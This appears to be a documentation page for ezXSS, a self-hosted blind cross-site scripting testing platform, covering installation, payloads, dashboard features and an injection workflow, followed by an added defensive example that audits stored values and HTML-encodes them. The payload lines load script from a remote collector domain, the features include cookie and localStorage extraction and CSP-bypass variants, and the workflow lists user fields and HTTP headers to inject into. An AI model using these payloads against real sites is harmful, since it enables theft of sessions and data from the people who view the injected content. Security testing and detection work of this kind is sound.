ezXSS

Easy blind cross-site scripting testing

Description

ezXSS is an easy-to-deploy platform for finding blind XSS vulnerabilities. It provides a self-hosted dashboard to manage payloads, track executions, and collect data when your blind XSS payloads fire. It also features email notifications and detailed execution reports.

Installation

BASH
# Requirements: PHP 7.4+, MySQL/MariaDB, Web server

git clone https://github.com/ssl/ezXSS.git
cd ezXSS

# Configure database
cp .env.example .env
# Edit .env with database credentials

# Install dependencies
composer install

# Set up database
php artisan migrate

# Configure your web server to point to the public/ directory

Basic Usage

JAVASCRIPT
// After setup, use generated payloads from the dashboard
"><script src=https://your-ezxss-domain.com/p.js></script>

// Short payload
<script src=//your-ezxss.com/p.js></script>

// Image-based
<img src=x onerror="s=document.createElement('script');s.src='//your-ezxss.com/p.js';document.head.appendChild(s)">

Advanced Usage

TEXT
# Dashboard features:
# - Custom payload generation with encoding options
# - Email alerts when blind XSS fires
# - Screenshot capture of execution context
# - Cookie/localStorage extraction
# - Custom JavaScript execution on callback
# - IP and User-Agent logging
# - DOM snapshot collection

# Payload customization:
# - Base64 encoded payloads
# - Polyglot payloads
# - Payload-length-optimized versions
# - CSP-bypass variants

Common Workflows

BASH
# Deploy ezXSS on a VPS with proper SSL
# Then inject payloads in all user-controllable fields:

# Contact forms
# Support tickets
# Profile fields (name, bio, address)
# File upload names
# HTTP headers (User-Agent, Referer, X-Forwarded-For)
# Webhook URLs
# API error messages that might be logged
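
The defender's side of the fields listed above, as an added example that is not part of ezXSS or of the original page: audit stored values for markup that would run script, and HTML-encode every value when a back-office view renders it. The record field names, the rule set and the `intranet.example` URL are constructed for illustration.

```javascript
// Added example: defender-side audit and output encoding, not ezXSS code.
// Constructed sample records for the kinds of fields the page lists.
const records = [
  { id: 1, field: 'ticket.body', value: 'Printer on floor 3 is offline' },
  { id: 2, field: 'profile.bio', value: '"><script src=https://your-ezxss-domain.com/p.js></script>' },
  { id: 3, field: 'http.user_agent', value: '<script src=//your-ezxss.com/p.js></script>' },
  { id: 4, field: 'upload.filename', value: "<img src=x onerror=\"s=document.createElement('script')\">.png" },
  { id: 5, field: 'http.referer', value: 'https://intranet.example/search?q=a<b' },
];

// Patterns for markup that would execute script if rendered unescaped.
const RULES = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'event-handler', re: /<[^>]*\son[a-z]+\s*=/i },
  { name: 'javascript-url', re: /(?:href|src)\s*=\s*["']?\s*javascript:/i },
];

// Return one finding per record that matches at least one rule.
function auditRecords(rows) {
  return rows
    .map((r) => ({
      id: r.id,
      field: r.field,
      rules: RULES.filter((x) => x.re.test(r.value)).map((x) => x.name),
    }))
    .filter((f) => f.rules.length > 0);
}

// Output encoding for HTML text nodes and quoted attribute values.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Render a back-office table row with every stored value encoded.
function renderRow(r) {
  return `<tr><td>${escapeHtml(r.field)}</td><td>${escapeHtml(r.value)}</td></tr>`;
}

const findings = auditRecords(records);
console.log(findings);
console.log(records.map(renderRow).join('\n'));
```

The audit is a triage aid for data already stored; the encoding in `renderRow` is what keeps a stored value from executing in the viewer's browser.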